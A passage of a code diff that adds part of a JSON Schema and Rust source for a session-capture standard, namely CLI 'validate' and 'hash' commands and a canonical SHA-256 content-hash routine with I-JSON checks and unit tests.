+          "description": "Class of environment the session ran in. Known values are local, vps, container, and workflow. NOT a closed enum: section 8.3 requires consumers to tolerate values added in a later minor version, so validating against a fixed list here would reject envelopes the standard declares conformant.",
+          "minLength": 1,
+          "examples": ["local", "vps", "container", "workflow"]
+        }
+      }
+    },
+    "Metadata": {
+      "type": "object",
+      "description": "Freeform, non-load-bearing metadata. First-class for search: conformant stores SHOULD support filtering and querying by these fields. No field here is required by the schema.",
+      "additionalProperties": true,
+      "properties": {
+        "repo": {
+          "type": "string",
+          "description": "Repository slug the session worked in, for example owner/name."
+        },
+        "git_remote": {
+          "type": "string",
+          "description": "Git remote URL for the working tree."
+        },
+        "cwd": {
+          "type": "string",
+          "description": "Working directory of the session."
+        },
+        "project": {
+          "type": "string",
+          "description": "Project name the session belongs to."
+        },
+        "model": {
+          "type": "string",
+          "description": "Model identifier used, for example claude-opus-4-8."
+        },
+        "tags": {
+          "type": "array",
+          "items": { "type": "string" },
+          "description": "Free-form operator tags."
+        },
+        "message_count": {
+          "type": "integer",
+          "minimum": 0,
+          "description": "Hint for the number of messages in the session."
+        },
+        "source_path": {
+          "type": "string",
+          "description": "The transcript's original path on the capturing machine, relative to the harness session root. Used preferentially by a Reconstitutor (section 6.4). Untrusted input: a Reconstitutor MUST reject absolute values or values escaping the harness root (section 6.4.5)."
+        },
+        "workflow_id": {
+          "type": ["string", "null"],
+          "description": "For Exporter sessions produced as part of a multi-agent run, the shared id that groups the run's per-agent envelopes."
+        }
+      }
+    }
+  }
+}

--- a/standards/v1/APS-V1-0004-session-capture/src/cli.rs
+++ b/standards/v1/APS-V1-0004-session-capture/src/cli.rs
@@ -1,0 +1,354 @@
+//! CLI commands for APS-V1-0004 (APS-V1-0000.CL01).
+//!
+//! The standard is definitional, so these commands do not manage a project.
+//! They expose the two operations a consumer most often needs to perform against
+//! the standard itself:
+//!
+//! - `validate` answers "is this envelope conformant?" It runs the I-JSON check
+//!   on the original text (which is the only point duplicate member names are
+//!   still visible), then the crate's structural validation. It deliberately
+//!   does NOT run the JSON Schema: `SessionEnvelope` deserialization already
+//!   enforces the schema's required fields and types, and a test asserts the two
+//!   layers agree, so running both here would report the same failure twice.
+//! - `hash` computes the canonical `content_hash` (section 4.2.3), so a store
+//!   implementer can compare their computation against the reference one. The
+//!   hash is the most interoperability-sensitive rule in the standard, and a
+//!   store that derives it differently silently fails to deduplicate.
+//!
+//! Both commands validate before acting. `hash` in particular must not print a
+//! digest for a non-conformant envelope: that digest would look authoritative
+//! while describing something the standard rejects.
+
+use apss_core::registry::{CommandHandler, CommandInfo};
+
+use crate::{
+    SessionEnvelope,
+    content_hash::{content_hash_for, parse_ijson},
+};
+
+/// Commands this standard registers.
+pub const COMMAND_NAMES: [&str; 2] = ["validate", "hash"];
+
+/// Exit codes, per APS-V1-0000.CL01.
+mod exit {
+    pub const SUCCESS: i32 = 0;
+    pub const ERROR: i32 = 1;
+    pub const USAGE: i32 = 3;
+}
+
+/// Dispatches this standard's commands.
+#[derive(Debug, Default)]
+pub struct SessionCaptureCommandHandler;
+
+impl SessionCaptureCommandHandler {
+    /// Create a handler.
+    pub fn new() -> Self {
+        Self
+    }
+}
+
+/// Read the envelopes in a file, accepting either a single envelope or a batch
+/// body (`{ "envelopes": [...] }`, section 5.1).
+fn envelopes_in(path: &str) -> Result<Vec<serde_json::Value>, String> {
+    let text = std::fs::read_to_string(path).map_err(|e| format!("cannot read {path}: {e}"))?;
+
+    // I-JSON first, on the original text. Duplicate member names are invisible
+    // after parsing, so this cannot be deferred (section 4.2.3).
+    let value = parse_ijson(&text).map_err(|e| format!("{path}: {e}"))?;
+
+    if value.is_array() {
+        return Err(format!(
+            "{path}: a batch body must be wrapped as {{ \"envelopes\": [...] }}, \
+             not a bare array (section 5.1)"
+        ));
+    }
+
+    // Distinguish a batch from a single envelope by shape, not by key presence:
+    // the schema permits unknown top-level fields, so a lone envelope carrying an
+    // extension field named `envelopes` would otherwise be misread as a batch.
+    let looks_like_batch = value.get("envelopes").is_some() && value.get("raw").is_none();
+    if looks_like_batch {
+        let array = value["envelopes"]
+            .as_array()
+            .ok_or_else(|| format!("{path}: `envelopes` must be an array (section 5.1)"))?;
+        if array.is_empty() {
+            return Err(format!(
+                "{path}: a batch must carry one or more envelopes (section 5.1)"
+            ));
+        }
+        return Ok(array.clone());
+    }
+    Ok(vec![value])
+}
+
+fn parse_envelope(value: &serde_json::Value, index: usize) -> Result<SessionEnvelope, String> {
+    serde_json::from_value(value.clone()).map_err(|e| format!("envelope[{index}]: {e}"))
+}
+
+fn run_validate(args: &[String]) -> i32 {
+    let Some(path) = args.first() else {
+        eprintln!("usage: validate <file.json>");
+        return exit::USAGE;
+    };
+
+    let envelopes = match envelopes_in(path) {
+        Ok(envelopes) => envelopes,
+        Err(message) => {
+            eprintln!("error: {message}");
+            return exit::ERROR;
+        }
+    };
+
+    let mut failures = 0usize;
+    for (index, value) in envelopes.iter().enumerate() {
+        match parse_envelope(value, index) {
+            Ok(envelope) => match envelope.validate() {
+                Ok(()) => {
+                    let state = if envelope.content_hash.is_some() {
+                        "stored"
+                    } else {
+                        "in flight"
+                    };
+                    println!("envelope[{index}] {} ok ({state})", envelope.session_id);
+                }
+                Err(error) => {
+                    failures += 1;
+                    eprintln!("envelope[{index}] invalid: {error}");
+                }
+            },
+            Err(message) => {
+                failures += 1;
+                eprintln!("error: {message}");
+            }
+        }
+    }
+
+    if failures == 0 {
+        println!("{} envelope(s) conform to APS-V1-0004", envelopes.len());
+        exit::SUCCESS
+    } else {
+        eprintln!("{failures} of {} envelope(s) failed", envelopes.len());
+        exit::ERROR
+    }
+}
+
+fn run_hash(args: &[String]) -> i32 {
+    let Some(path) = args.first() else {
+        eprintln!("usage: hash <file.json>");
+        return exit::USAGE;
+    };
+
+    let envelopes = match envelopes_in(path) {
+        Ok(envelopes) => envelopes,
+        Err(message) => {
+            eprintln!("error: {message}");
+            return exit::ERROR;
+        }
+    };
+
+    let mut failures = 0usize;
+    for (index, value) in envelopes.iter().enumerate() {
+        match parse_envelope(value, index).and_then(|envelope| {
+            // Never print a digest for a non-conformant envelope: it would look
+            // authoritative while describing something the standard rejects.
+            envelope
+                .validate()
+                .map_err(|e| format!("envelope[{index}] invalid, refusing to hash: {e}"))?;
+            content_hash_for(&envelope)
+                .map(|hash| (envelope.session_id, hash))
+                .map_err(|e| format!("envelope[{index}]: {e}"))
+        }) {
+            Ok((session_id, hash)) => println!("{session_id}\t{hash}"),
+            Err(message) => {
+                failures += 1;
+                eprintln!("error: {message}");
+            }
+        }
+    }
+
+    if failures == 0 {
+        exit::SUCCESS
+    } else {
+        exit::ERROR
+    }
+}
+
+impl CommandHandler for SessionCaptureCommandHandler {
+    fn execute(&self, command: &str, args: &[String], _config: &toml::Value) -> i32 {
+        match command {
+            "validate" => run_validate(args),
+            "hash" => run_hash(args),
+            other => {
+                eprintln!("unknown command `{other}`; expected one of: validate, hash");
+                exit::USAGE
+            }
+        }
+    }
+
+    fn commands(&self) -> Vec<CommandInfo> {
+        vec![
+            CommandInfo {
+                name: "validate".to_string(),
+                description: "Validate session envelopes against APS-V1-0004".to_string(),
+                usage: "validate <file.json>".to_string(),
+            },
+            CommandInfo {
+                name: "hash".to_string(),
+                description: "Compute the canonical content_hash for captured content".to_string(),
+                usage: "hash <file.json>".to_string(),
+            },
+        ]
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    const SOURCE_EXAMPLE: &str = "../examples/claude-source-envelope.json";
+    const BATCH_EXAMPLE: &str = "../examples/workflow-exporter-batch.json";
+
+    fn example(relative: &str) -> String {
+        std::path::Path::new(env!("CARGO_MANIFEST_DIR"))
+            .join("src")
+            .join(relative)
+            .to_string_lossy()
+            .into_owned()
+    }
+
+    fn handler() -> SessionCaptureCommandHandler {
+        SessionCaptureCommandHandler::new()
+    }
+
+    fn empty_config() -> toml::Value {
+        toml::Value::Table(toml::map::Map::new())
+    }
+
+    #[test]
+    fn registered_command_names_match_the_handler() {
+        let listed: Vec<String> = handler().commands().into_iter().map(|c| c.name).collect();
+        assert_eq!(listed, COMMAND_NAMES);
+    }
+
+    #[test]
+    fn validate_accepts_the_shipped_examples() {
+        for path in [SOURCE_EXAMPLE, BATCH_EXAMPLE] {
+            assert_eq!(
+                handler().execute("validate", &[example(path)], &empty_config()),
+                exit::SUCCESS,
+                "{path} must validate"
+            );
+        }
+    }
+
+    #[test]
+    fn hash_succeeds_for_the_shipped_examples() {
+        for path in [SOURCE_EXAMPLE, BATCH_EXAMPLE] {
+            assert_eq!(
+                handler().execute("hash", &[example(path)], &empty_config()),
+                exit::SUCCESS
+            );
+        }
+    }
+
+    #[test]
+    fn a_bare_array_batch_is_rejected_with_a_pointer_to_the_wrapper() {
+        let path = std::env::temp_dir().join("apss-scs-cli-bare-array.json");
+        std::fs::write(&path, b"[]").unwrap();
+        let arg = path.to_string_lossy().into_owned();
+        assert_eq!(
+            handler().execute("validate", &[arg], &empty_config()),
+            exit::ERROR,
+            "section 5.1 forbids a bare top-level array"
+        );
+        let _ = std::fs::remove_file(&path);
+    }
+
+    fn with_temp_file(name: &str, contents: &str, run: impl Fn(String) -> i32) -> i32 {
+        let path = std::env::temp_dir().join(name);
+        std::fs::write(&path, contents).unwrap();
+        let code = run(path.to_string_lossy().into_owned());
+        let _ = std::fs::remove_file(&path);
+        code
+    }
+
+    /// Duplicate member names are invisible after parsing, so the CLI must run
+    /// the I-JSON check on the original text (spec 4.2.3).
+    #[test]
+    fn duplicate_member_names_are_rejected() {
+        let code = with_temp_file("apss-scs-cli-dupe.json", r#"{"a":1,"a":2}"#, |arg| {
+            handler().execute("validate", &[arg], &empty_config())
+        });
+        assert_eq!(code, exit::ERROR);
+    }
+
+    /// `hash` must refuse a non-conformant envelope rather than print a digest
+    /// that looks authoritative for something the standard rejects.
+    #[test]
+    fn hash_refuses_a_non_conformant_envelope() {
+        // Valid JSON and a parseable envelope, but `raw` is a scalar.
+        let bad = r#"{
+          "scs_version": "1.0",
+          "origin": { "host": "h", "environment": "local" },
+          "agent": "ClaudeCode",
+          "source_format": "claude-jsonl-v1",
+          "session_id": "abc-123",
+          "started_at": "2026-05-02T14:03:11Z",
+          "last_activity_at": "2026-05-02T15:20:44Z",
+          "raw": 42
+        }"#;
+        let code = with_temp_file("apss-scs-cli-badraw.json", bad, |arg| {
+            handler().execute("hash", &[arg], &empty_config())
+        });
+        assert_eq!(code, exit::ERROR);
+    }
+
+    #[test]
+    fn an_empty_batch_is_rejected() {
+        let code = with_temp_file(
+            "apss-scs-cli-empty-batch.json",
+            r#"{"envelopes":[]}"#,
+            |arg| handler().execute("validate", &[arg], &empty_config()),
+        );
+        assert_eq!(
+            code,
+            exit::ERROR,
+            "section 5.1 requires one or more envelopes"
+        );
+    }
+
+    /// The schema permits unknown top-level fields, so a single envelope that
+    /// happens to carry one named `envelopes` must not be misread as a batch.
+    #[test]
+    fn a_lone_envelope_with_an_envelopes_extension_field_is_not_a_batch() {
+        let envelope = r#"{
+          "scs_version": "1.0",
+          "origin": { "host": "h", "environment": "local" },
+          "agent": "ClaudeCode",
+          "source_format": "claude-jsonl-v1",
+          "session_id": "abc-123",
+          "started_at": "2026-05-02T14:03:11Z",
+          "last_activity_at": "2026-05-02T15:20:44Z",
+          "raw": "transcript",
+          "envelopes": "an extension field from some later minor"
+        }"#;
+        let code = with_temp_file("apss-scs-cli-ambiguous.json", envelope, |arg| {
+            handler().execute("validate", &[arg], &empty_config())
+        });
+        assert_eq!(code, exit::SUCCESS);
+    }
+
+    #[test]
+    fn missing_argument_is_a_usage_error_not_a_failure() {
+        assert_eq!(
+            handler().execute("validate", &[], &empty_config()),
+            exit::USAGE
+        );
+        assert_eq!(handler().execute("hash", &[], &empty_config()), exit::USAGE);
+    }
+
+    #[test]
+    fn an_unknown_command_is_a_usage_error() {
+        assert_eq!(handler().execute("nope", &[], &empty_config()), exit::USAGE);
+    }
+}

--- a/standards/v1/APS-V1-0004-session-capture/src/content_hash.rs
+++ b/standards/v1/APS-V1-0004-session-capture/src/content_hash.rs
@@ -1,0 +1,530 @@
+//! The canonical `content_hash` computation (APS-V1-0004 section 4.2.3).
+//!
+//! `content_hash` is the dedup identity for a session. Two independent stores
+//! MUST derive the same digest for the same captured content, or the same
+//! session stored in two places is two different sessions and dedup does not
+//! interoperate. That makes this the most interoperability-sensitive rule in the
+//! standard, which is why the implementation ships here rather than being left
+//! to prose.
+//!
+//! # What is hashed
+//!
+//! Exactly three members, taken from the envelope as RECEIVED, before the store
+//! sanitizes:
+//!
+//! ```json
+//! { "raw": ..., "session_format": "<source_format>", "session_id": "<session_id>" }
+//! ```
+//!
+//! `content_hash` is excluded by construction, since a structure containing its
+//! own digest cannot be hashed. Timestamps, `origin`, `agent`, and `metadata` are
+//! excluded because they describe the capture event rather than the content and
+//! can differ between two captures of the same session.
+//!
+//! The object is serialized with RFC 8785 JSON Canonicalization Scheme, then
+//! hashed with SHA-256, then rendered `sha256:<lowercase hex>`.
+//!
+//! # Why before sanitization
+//!
+//! Hashing the sanitized form would make the sanitizer ruleset part of session
+//! identity: every secret-detection improvement would move the digest of content
+//! that never changed. See section 3.9. The pre-sanitization value is hashed in
+//! memory and never persisted (section 5.4).
+
+use serde::Serialize;
+use serde::de::{self, Deserialize, Deserializer, MapAccess, SeqAccess, Visitor};
+use sha2::{Digest, Sha256};
+
+use crate::SessionEnvelope;
+
+/// The largest integer exactly representable as an IEEE-754 double.
+///
+/// JCS renders every number as a double (RFC 8785 section 3.2.2.3). An integer
+/// beyond this magnitude therefore loses precision during canonicalization, and
+/// two distinct values collapse to the same canonical form and the same digest.
+const MAX_EXACT_INTEGER: i128 = 9_007_199_254_740_992; // 2^53
+
+/// Errors from computing a content hash.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum ContentHashError {
+    /// An object contained a duplicate member name.
+    ///
+    /// I-JSON requires unique names, and JCS has no defined ordering for
+    /// duplicates. Note that most JSON parsers silently keep the last value, so
+    /// `{"a":1,"a":2}` and `{"a":2}` would otherwise produce the same digest
+    /// despite being different documents.
+    DuplicateMemberName(String),
+    /// A number was too large to survive canonicalization exactly.
+    ///
+    /// Beyond 2^53 the double conversion JCS mandates is lossy, so
+    /// `9007199254740993` and `9007199254740992` would canonicalize identically
+    /// and receive the same digest.
+    NumberNotExactlyRepresentable(String),
+    /// The value could not be canonicalized per RFC 8785 for any other reason.
+    NotCanonicalizable,
+}
+
+impl std::fmt::Display for ContentHashError {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            ContentHashError::DuplicateMemberName(name) => write!(
+                f,
+                "duplicate object member name `{name}`: I-JSON requires unique names, so this has no RFC 8785 canonical form"
+            ),
+            ContentHashError::NumberNotExactlyRepresentable(value) => write!(
+                f,
+                "number {value} exceeds 2^53 and cannot survive the IEEE-754 conversion RFC 8785 requires, so its digest would collide with a different value"
+            ),
+            ContentHashError::NotCanonicalizable => write!(
+                f,
+                "value is not I-JSON compatible, so it has no RFC 8785 canonical form and therefore no conforming content_hash"
+            ),
+        }
+    }
+}
+
+impl std::error::Error for ContentHashError {}
+
+// ─── I-JSON parsing ─────────────────────────────────────────────────────────
+
+/// A `serde_json::Value` parsed under I-JSON rules.
+struct IJson(serde_json::Value);
+
+struct IJsonVisitor;
+
+impl<'de> Visitor<'de> for IJsonVisitor {
+    type Value = IJson;
+
+    fn expecting(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        f.write_str("an I-JSON value")
+    }
+
+    fn visit_bool<E: de::Error>(self, v: bool) -> Result<IJson, E> {
+        Ok(IJson(serde_json::Value::Bool(v)))
+    }
+
+    fn visit_i64<E: de::Error>(self, v: i64) -> Result<IJson, E> {
+        if (v as i128).abs() > MAX_EXACT_INTEGER {
+            return Err(E::custom(format!("number-not-exact:{v}")));
+        }
+        Ok(IJson(serde_json::Value::from(v)))
+    }
+
+    fn visit_u64<E: de::Error>(self, v: u64) -> Result<IJson, E> {
+        if v as i128 > MAX_EXACT_INTEGER {
+            return Err(E::custom(format!("number-not-exact:{v}")));
+        }
+        Ok(IJson(serde_json::Value::from(v)))
+    }
+
+    fn visit_f64<E: de::Error>(self, v: f64) -> Result<IJson, E> {
+        // Already a double, so canonicalization is lossless. Non-finite values
+        // cannot appear in parsed JSON.
+        Ok(IJson(serde_json::Value::from(v)))
+    }
+
+    fn visit_str<E: de::Error>(self, v: &str) -> Result<IJson, E> {
+        Ok(IJson(serde_json::Value::String(v.to_owned())))
+    }
+
+    fn visit_unit<E: de::Error>(self) -> Result<IJson, E> {
+        Ok(IJson(serde_json::Value::Null))
+    }
+
+    fn visit_none<E: de::Error>(self) -> Result<IJson, E> {
+        Ok(IJson(serde_json::Value::Null))
+    }
+
+    fn visit_some<D: Deserializer<'de>>(self, d: D) -> Result<IJson, D::Error> {
+        d.deserialize_any(IJsonVisitor)
+    }
+
+    fn visit_seq<A: SeqAccess<'de>>(self, mut access: A) -> Result<IJson, A::Error> {
+        let mut items = Vec::new();
+        while let Some(IJson(value)) = access.next_element()? {
+            items.push(value);
+        }
+        Ok(IJson(serde_json::Value::Array(items)))
+    }
+
+    fn visit_map<A: MapAccess<'de>>(self, mut access: A) -> Result<IJson, A::Error> {
+        let mut map = serde_json::Map::new();
+        while let Some(key) = access.next_key::<String>()? {
+            let IJson(value) = access.next_value()?;
+            // The whole reason this visitor exists: serde_json's own Value
+            // deserializer overwrites here instead of complaining.
+            if map.contains_key(&key) {
+                return Err(de::Error::custom(format!("duplicate-member:{key}")));
+            }
+            map.insert(key, value);
+        }
+        Ok(IJson(serde_json::Value::Object(map)))
+    }
+}
+
+impl<'de> Deserialize<'de> for IJson {
+    fn deserialize<D: Deserializer<'de>>(d: D) -> Result<Self, D::Error> {
+        d.deserialize_any(IJsonVisitor)
+    }
+}
+
+/// Map a visitor error string back to a typed error.
+fn classify(message: &str) -> ContentHashError {
+    if let Some(name) = message
+        .split_once("duplicate-member:")
+        .map(|(_, rest)| rest.split(" at line").next().unwrap_or(rest).trim())
+    {
+        return ContentHashError::DuplicateMemberName(name.to_string());
+    }
+    if let Some(value) = message
+        .split_once("number-not-exact:")
+        .map(|(_, rest)| rest.split(" at line").next().unwrap_or(rest).trim())
+    {
+        return ContentHashError::NumberNotExactlyRepresentable(value.to_string());
+    }
+    ContentHashError::NotCanonicalizable
+}
+
+/// Parse JSON text under I-JSON rules, rejecting what RFC 8785 cannot
+/// canonicalize (section 4.2.3).
+///
+/// A store MUST use this, or an equivalent check, on the ORIGINAL request bytes.
+/// Parsing first and validating afterwards does not work: duplicate member names
+/// are gone by the time a `serde_json::Value` exists, because the parser keeps
+/// the last one silently.
+pub fn parse_ijson(text: &str) -> Result<serde_json::Value, ContentHashError> {
+    match serde_json::from_str::<IJson>(text) {
+        Ok(IJson(value)) => Ok(value),
+        Err(error) => Err(classify(&error.to_string())),
+    }
+}
+
+/// Check an already-parsed value for the I-JSON violations still detectable.
+///
+/// Numbers can be checked here; duplicate member names CANNOT, because parsing
+/// has already discarded them. Use [`parse_ijson`] on the original text when the
+/// text is available.
+pub fn check_ijson_value(value: &serde_json::Value) -> Result<(), ContentHashError> {
+    match value {
+        serde_json::Value::Number(number) => {
+            let exceeds = number
+                .as_u64()
+                .map(|v| v as i128 > MAX_EXACT_INTEGER)
+                .or_else(|| {
+                    number
+                        .as_i64()
+                        .map(|v| (v as i128).abs() > MAX_EXACT_INTEGER)
+                })
+                .unwrap_or(false);
+            if exceeds {
+                return Err(ContentHashError::NumberNotExactlyRepresentable(
+                    number.to_string(),
+                ));
+            }
+            Ok(())
+        }
+        serde_json::Value::Array(items) => items.iter().try_for_each(check_ijson_value),
+        serde_json::Value::Object(map) => map.values().try_for_each(check_ijson_value),
+        _ => Ok(()),
+    }
+}
+
+/// The hash input (section 4.2.3).
+///
+/// Field order here is irrelevant to the result: JCS sorts member names. It is
+/// written in sorted order anyway so the code reads like the spec.
+#[derive(Serialize)]
+struct HashInput<'a> {
+    raw: &'a serde_json::Value,
+    session_format: &'a str,
+    session_id: &'a str,
+}
+
+/// Compute the canonical `content_hash` for captured content.
+///
+/// Takes the three inputs directly so a store can hash at ingest without first
+/// constructing an envelope. See [`content_hash_for`] for the envelope form.
+pub fn content_hash(
+    session_id: &str,
+    source_format: &str,
+    raw: &serde_json::Value,
+) -> Result<String, ContentHashError> {
+    // Reject what canonicalization would silently coerce. Without this, two
+    // different `raw` values receive the same digest and dedup merges two
+    // distinct sessions into one.
+    check_ijson_value(raw)?;
+
+    let input = HashInput {
+        raw,
+        session_format: source_format,
+        session_id,
+    };
+    let canonical = serde_json_canonicalizer::to_vec(&input)
+        .map_err(|_| ContentHashError::NotCanonicalizable)?;
+    let digest = Sha256::digest(&canonical);
+    // Lowercase hex is REQUIRED: two implementations that agree on the digest
+    // bytes but disagree on casing would produce unequal dedup keys.
+    Ok(format!("sha256:{digest:x}"))
+}
+
+/// Compute the canonical `content_hash` for an envelope's captured content.
+///
+/// Ignores any `content_hash` already present, which is the required behaviour:
+/// a store MUST NOT honour a producer-supplied value (section 4.2.3).
+pub fn content_hash_for(envelope: &SessionEnvelope) -> Result<String, ContentHashError> {
+    content_hash(&envelope.session_id, &envelope.source_format, &envelope.raw)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn raw_string() -> serde_json::Value {
+        serde_json::Value::String("{\"a\":1}\n{\"b\":2}\n".to_string())
+    }
+
+    /// Known-answer test. The digest must be reproducible by any implementer
+    /// from the spec text alone, so it is pinned here as a conformance vector.
+    ///
+    /// This value was computed INDEPENDENTLY of this crate, by canonicalizing
+    /// the input per RFC 8785 and hashing it in a separate implementation, and
+    /// only then pinned. Pinning whatever the code happened to emit would make
+    /// the test circular and would prove nothing about interoperability.
+    ///
+    /// Canonical form of the input:
+    ///
+    /// ```text
+    /// {"raw":"{\"a\":1}\n{\"b\":2}\n","session_format":"claude-jsonl-v1","session_id":"abc-123"}
+    /// ```
+    ///
+    /// A change to this value is a BREAKING change to dedup across every store
+    /// and every already-captured session. This test is what makes that
+    /// impossible to do by accident.
+    #[test]
+    fn known_answer_is_pinned() {
+        let hash = content_hash("abc-123", "claude-jsonl-v1", &raw_string()).unwrap();
+        assert_eq!(
+            hash, "sha256:08499b689727559e3b984f5cd14d91444b3a74adb5852978df8a267ecb09b77f",
+            "the canonical digest is a wire-visible constant; changing it breaks \
+             dedup interoperability with every already-stored session"
+        );
+    }
+
+    /// Regression: these two documents differ, but JCS renders every number as a
+    /// double, so beyond 2^53 they canonicalize identically. Before the I-JSON
+    /// check both hashed to the same digest, which would have merged two
+    /// distinct sessions into one during dedup.
+    #[test]
+    fn integers_beyond_2_53_are_rejected_rather_than_colliding() {
+        let at_limit: serde_json::Value =
+            serde_json::from_str(r#"{"n":9007199254740992}"#).unwrap();
+        let past_limit: serde_json::Value =
+            serde_json::from_str(r#"{"n":9007199254740993}"#).unwrap();
+
+        // 2^53 is exactly representable, so it remains hashable.
+        content_hash("s", "f", &at_limit).expect("2^53 is exact");
+
+        // 2^53 + 1 is not, and must be refused rather than silently coerced.
+        assert_eq!(
+            content_hash("s", "f", &past_limit).unwrap_err(),
+            ContentHashError::NumberNotExactlyRepresentable("9007199254740993".to_string())
+        );
+    }
+
+    #[test]
+    fn negative_integers_beyond_2_53_are_also_rejected() {
+        let value: serde_json::Value = serde_json::from_str(r#"{"n":-9007199254740993}"#).unwrap();
+        assert!(matches!(
+            content_hash("s", "f", &value).unwrap_err(),
+            ContentHashError::NumberNotExactlyRepresentable(_)
+        ));
+    }
+
+    #[test]
+    fn nested_out_of_range_numbers_are_found() {
+        let value: serde_json::Value =
+            serde_json::from_str(r#"{"a":[{"deep":9007199254740993}]}"#).unwrap();
+        assert!(matches!(
+            content_hash("s", "f", &value).unwrap_err(),
+            ContentHashError::NumberNotExactlyRepresentable(_)
+        ));
+    }
+
+    /// Regression: `{"a":1,"a":2}` and `{"a":2}` are different documents, but
+    /// serde_json keeps only the last member, so both previously produced the
+    /// same digest. Duplicates must be caught at PARSE time; by the time a
+    /// `Value` exists the evidence is gone.
+    #[test]
+    fn duplicate_member_names_are_rejected_at_parse_time() {
+        assert_eq!(
+            parse_ijson(r#"{"a":1,"a":2}"#).unwrap_err(),
+            ContentHashError::DuplicateMemberName("a".to_string())
+        );
+        // The distinct document that it would have collided with still parses.
+        assert!(parse_ijson(r#"{"a":2}"#).is_ok());
+    }
+
+    #[test]
+    fn duplicate_member_names_are_found_when_nested() {
+        assert!(matches!(
+            parse_ijson(r#"{"outer":{"a":1,"a":2}}"#).unwrap_err(),
+            ContentHashError::DuplicateMemberName(_)
+        ));
+        assert!(matches!(
+            parse_ijson(r#"[{"a":1,"a":2}]"#).unwrap_err(),
+            ContentHashError::DuplicateMemberName(_)
+        ));
+    }
+
+    #[test]
+    fn parse_ijson_rejects_out_of_range_numbers_too() {
+        assert!(matches!(
+            parse_ijson(r#"{"n":9007199254740993}"#).unwrap_err(),
+            ContentHashError::NumberNotExactlyRepresentable(_)
+        ));
+    }
+
+    #[test]
+    fn parse_ijson_accepts_ordinary_documents_unchanged() {
+        for text in [
+            r#"{"a":1,"b":[1,2,3],"c":{"d":null},"e":true,"f":1.5,"g":"x"}"#,
+            r#"[]"#,
+            r#""just a string""#,
+            r#"{"n":9007199254740992}"#,
+        ] {
+            let parsed = parse_ijson(text).unwrap_or_else(|e| panic!("{text} should parse: {e}"));
+            let expected: serde_json::Value = serde_json::from_str(text).unwrap();
+            assert_eq!(parsed, expected, "parsing must not alter the value");
+        }
+    }
+
+    #[test]
+    fn digest_is_lowercase_hex_with_algorithm_prefix() {
+        let hash = content_hash("s", "f", &raw_string()).unwrap();
+        let digest = hash.strip_prefix("sha256:").expect("algorithm prefix");
+        assert_eq!(digest.len(), 64);
+        assert!(
+            digest
+                .chars()
+                .all(|c| c.is_ascii_digit() || ('a'..='f').contains(&c)),
+            "hex must be lowercase so equal digests compare equal as strings"
+        );
+    }
+
+    /// Member ordering in the source object must not change the digest: JCS
+    /// sorts. This is what lets two stores with different struct layouts agree.
+    #[test]
+    fn member_order_of_raw_does_not_change_the_digest() {
+        let a: serde_json::Value = serde_json::from_str(r#"{"b":2,"a":1}"#).unwrap();
+        let b: serde_json::Value = serde_json::from_str(r#"{"a":1,"b":2}"#).unwrap();
+        assert_eq!(
+            content_hash("s", "f", &a).unwrap(),
+            content_hash("s", "f", &b).unwrap()
+        );
+    }
+
+    /// Whitespace in a STRING raw is content and must change the digest, which
+    /// is exactly why a verbatim string raw supports byte-exact reconstitution.
+    #[test]
+    fn whitespace_in_string_raw_changes_the_digest() {
+        let a = serde_json::Value::String("{\"a\":1}".into());
+        let b = serde_json::Value::String("{ \"a\": 1 }".into());
+        assert_ne!(
+            content_hash("s", "f", &a).unwrap(),
+            content_hash("s", "f", &b).unwrap()
+        );
+    }
+
+    #[test]
+    fn every_hashed_member_affects_the_digest() {
+        let base = content_hash("s", "f", &raw_string()).unwrap();
+        assert_ne!(base, content_hash("s2", "f", &raw_string()).unwrap());
+        assert_ne!(base, content_hash("s", "f2", &raw_string()).unwrap());
+        assert_ne!(
+            base,
+            content_hash("s", "f", &serde_json::Value::String("other".into())).unwrap()
+        );
+    }
+
+    /// Fields outside the hash input must NOT affect the digest, or two captures
+    /// of the same session would fail to deduplicate.
+    #[test]
+    fn capture_event_fields_do_not_affect_the_digest() {
+        let json = r#"{
+          "scs_version": "1.0",
+          "origin": { "host": "h1", "environment": "local" },
+          "agent": "ClaudeCode",
+          "source_format": "claude-jsonl-v1",
+          "session_id": "abc-123",
+          "started_at": "2026-05-02T14:03:11Z",
+          "last_activity_at": "2026-05-02T15:20:44Z",
+          "raw": "transcript"
+        }"#;
+        let first: SessionEnvelope = serde_json::from_str(json).unwrap();
+
+        // A second capture of the same session from a different host, at a
+        // different time, with different metadata, and carrying a bogus
+        // producer-supplied hash.
+        let mut second = first.clone();
+        second.origin.host = "a-different-machine".into();
+        second.origin.environment = "vps".into();
+        second.started_at = "2026-06-01T00:00:00Z".into();
+        second.last_activity_at = "2026-06-01T01:00:00Z".into();
+        second.agent = "SomethingElse".into();
+        second.content_hash =
+            Some("sha256:deadbeef00000000000000000000000000000000000000000000000000000000".into());
+        second.metadata = Some(crate::Metadata {
+            repo: Some("owner/name".into()),
+            ..Default::default()
+        });
+
+        assert_eq!(
+            content_hash_for(&first).unwrap(),
+            content_hash_for(&second).unwrap(),
+            "the same session captured twice must deduplicate"
+        );
+    }
+
+    #[test]
+    fn a_producer_supplied_hash_is_ignored() {
+        let json = r#"{
+          "scs_version": "1.0",
+          "origin": { "host": "h", "environment": "local" },
+          "agent": "ClaudeCode",
+          "source_format": "claude-jsonl-v1",
+          "session_id": "abc-123",
+          "started_at": "2026-05-02T14:03:11Z",
+          "last_activity_at": "2026-05-02T15:20:44Z",
+          "content_hash": "sha256:0000000000000000000000000000000000000000000000000000000000000000",
+          "raw": "transcript"
+        }"#;
+        let envelope: SessionEnvelope = serde_json::from_str(json).unwrap();
+        let computed = content_hash_for(&envelope).unwrap();
+        assert_ne!(
+            Some(computed.as_str()),
+            envelope.content_hash.as_deref(),
+            "the store's computation must not be influenced by what the producer sent"
+        );
+    }
+
+    /// The computed hash must satisfy the crate's own validator and the schema's
+    /// pattern, or a store would produce envelopes its own standard rejects.
+    #[test]
+    fn computed_hash_passes_envelope_validation() {
+        let json = r#"{
+          "scs_version": "1.0",
+          "origin": { "host": "h", "environment": "local" },
+          "agent": "ClaudeCode",
+          "source_format": "claude-jsonl-v1",
+          "session_id": "abc-123",
+          "started_at": "2026-05-02T14:03:11Z",
